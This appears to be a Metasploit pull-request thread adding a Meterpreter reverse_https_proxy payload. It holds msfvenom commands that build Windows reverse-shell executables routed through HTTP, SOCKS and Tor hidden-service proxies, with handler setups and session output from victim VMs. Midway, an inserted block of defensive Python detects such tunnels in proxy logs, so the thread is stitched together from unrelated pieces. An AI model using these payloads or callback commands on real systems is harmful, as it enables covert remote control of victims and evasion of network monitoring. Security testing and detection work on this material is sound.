New meterpreter payload reverse_https_proxy #2104
hi mubix, just sent you a PR with those modifications: from here
To test the msfvenom command below you need to apply this small 2-line patch to msfvenom: #2105

HTTP proxy without authentication

For testing I used a local host with a Windows VM running Apache as proxy and a Win 7 VM as victim.

    LoadModule proxy_connect_module modules/mod_proxy_connect.so
    ProxyRequests On
    <Proxy *>

Then to get this session: Victim (192.168.170.60) -> Proxy (192.168.170.50:80) -> handler (192.168.5.1:4444):

    use exploit/multi/handler
    [*] Meterpreter session 1 opened (192.168.5.1:4444 -> 192.168.5.50:49792) at 2013-07-15 16:23:17 +0100
    meterpreter > sysinfo

HTTP proxy with authentication

Reconfigure the Apache proxy for authentication like this:

    LoadModule proxy_connect_module modules/mod_proxy_connect.so
    ProxyRequests On
    <Proxy *>

Then for an authentication with test/pwd:

    use exploit/multi/handler
    [*] Meterpreter session 2 opened (192.168.5.1:4444 -> 192.168.5.50:50140) at 2013-07-15 16:31:19 +0100

SOCKS proxy

WinINet supports only the SOCKS4 protocol (even no socks4 ;( ), so authentication and DNS resolution aren't supported. For testing I used this small SOCKS proxy listening on port 1080: http://3proxy.ru/download/

Then:

    ./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=192.168.5.1 LPORT=4444 PROXYHOST=192.168.170.50 PROXYPORT=1080 PROXY_TYPE=SOCKS > ../met3.exe
    use exploit/multi/handler
    [*] Meterpreter session 1 opened (192.168.5.1:4444 -> 192.168.5.50:50298) at 2013-07-15 16:39:40 +0100

Tor hidden services

Unfortunately it is not possible to use a direct SOCKS connection on Tor to connect to a hidden service due to the DNS limitation of SOCKS4 ;(.

Then to get a session like this one: victim (127.0.0.1) -> privoxy (127.0.0.1:8118) -> tor (127.0.0.1:9050) -> attacker hidden service (2ei2yd5ng7mmge7x.onion:8443) -> handler (127.0.0.1:4444):

On the host configure a Tor hidden service by adding these lines in /etc/tor/torrc

Launch Tor and get the hidden onion hostname by:

On the victim VM launch Tor

    ./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=127.0.0.1 LPORT=4444 PROXYHOST=127.0.0.1 PROXYPORT=8118 HIDDENHOST=2ei2yd5ng7mmge7x.onion HIDDENPORT=8443 > ../met4.exe
    use exploit/multi/handler
    [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:37326) at 2013-07-15 17:11:42 +0100
    msf exploit(handler) > sessions -i 1
    meterpreter > sysinfo
This is the metsrv.dll file I used with the debug flag enabled: http://pastebin.com/uDARPZH5

To get it: pbget http://pastebin.com/uDARPZH5
TODO: I did not manage to get HTTPS on an HTTPS proxy working. Whatever combination of flag/conf I used in my test code, WinINet keeps connecting to an HTTPS proxy with an HTTP packet and I get an error: Your browser sent a request that this server could not understand ...
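From the defender's side, the proxy hop in the test set-ups above leaves a trace: a forward proxy such as the Apache configuration shown logs each tunnel as a CONNECT request, so a tunnel to a bare IP or to a port other than 443 (the 192.168.5.1:4444 handler here) stands out in the proxy access log. This is an added example, not code from the PR or from Metasploit; the log lines are constructed for illustration and the format assumed is Apache's common log format.

```python
import ipaddress
import re

# Apache common log format as written by a forward proxy (CONNECT target is host:port).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+')

EXPECTED_TUNNEL_PORTS = {443, 8443}  # what a browser normally tunnels to with CONNECT

# Constructed sample: two tunnels to the handler port, one normal TLS tunnel, one plain GET.
SAMPLE_LOG = """\
192.168.170.60 - - [15/Jul/2013:16:23:10 +0100] "CONNECT 192.168.5.1:4444 HTTP/1.1" 200 -
192.168.170.60 - - [15/Jul/2013:16:23:12 +0100] "CONNECT www.example.com:443 HTTP/1.1" 200 -
192.168.170.61 - test [15/Jul/2013:16:31:15 +0100] "CONNECT 192.168.5.1:4444 HTTP/1.1" 200 -
192.168.170.62 - - [15/Jul/2013:16:40:00 +0100] "GET http://www.example.com/ HTTP/1.1" 200 1234
"""

def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_connect(rec):
    """Return why a CONNECT record looks like a non-browser tunnel, or None if it looks normal."""
    if rec is None or rec["method"] != "CONNECT":
        return None
    host, _, port = rec["target"].rpartition(":")
    if not port.isdigit():
        return None
    reasons = []
    try:
        ipaddress.ip_address(host.strip("[]"))  # browsers rarely tunnel to a bare IP
        reasons.append("literal-ip")
    except ValueError:
        pass
    if int(port) not in EXPECTED_TUNNEL_PORTS:
        reasons.append(f"port-{port}")
    return reasons or None

def find_suspicious_tunnels(log_text):
    """Return (client, target, reasons) for every flagged CONNECT line in the log."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        reasons = suspicious_connect(rec)
        if reasons:
            hits.append((rec["client"], rec["target"], reasons))
    return hits
```

Running find_suspicious_tunnels(SAMPLE_LOG) flags only the two CONNECT lines to 192.168.5.1:4444; the tunnel to www.example.com:443 and the plain GET pass. The port set and the literal-IP rule are starting points to tune against the proxy's normal traffic.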
add some features
Tested fine unauthenticated via Burp. Tested fine authenticated via Squid with NCSA auth (whatever that is).
Tor hidden services:
Will be looking at this today.
Works for me, still doing more tests on this:
Tested with multi/handler on Windows XP, Windows 7, Windows 2003 SP2 and Windows 8. No issues. Not as stable with existing exploits. Difficult to prevent this kind of issue from happening, because when those exploits were written, this windows/meterpreter/reverse_https_proxy did not exist. You guys might just have to be aware of that until we look into each case one by one, and maybe fix them.
good work, alex :)
hi @wchen-r7, if this PR is merged, then the associated meterpreter PR should be merged too and metsrv.dll updated, or it won't work at all: rapid7/meterpreter#12
@todb-r7 Are there any ways to make dependencies between pulls/submodules etc? |
splitting of pull request #1044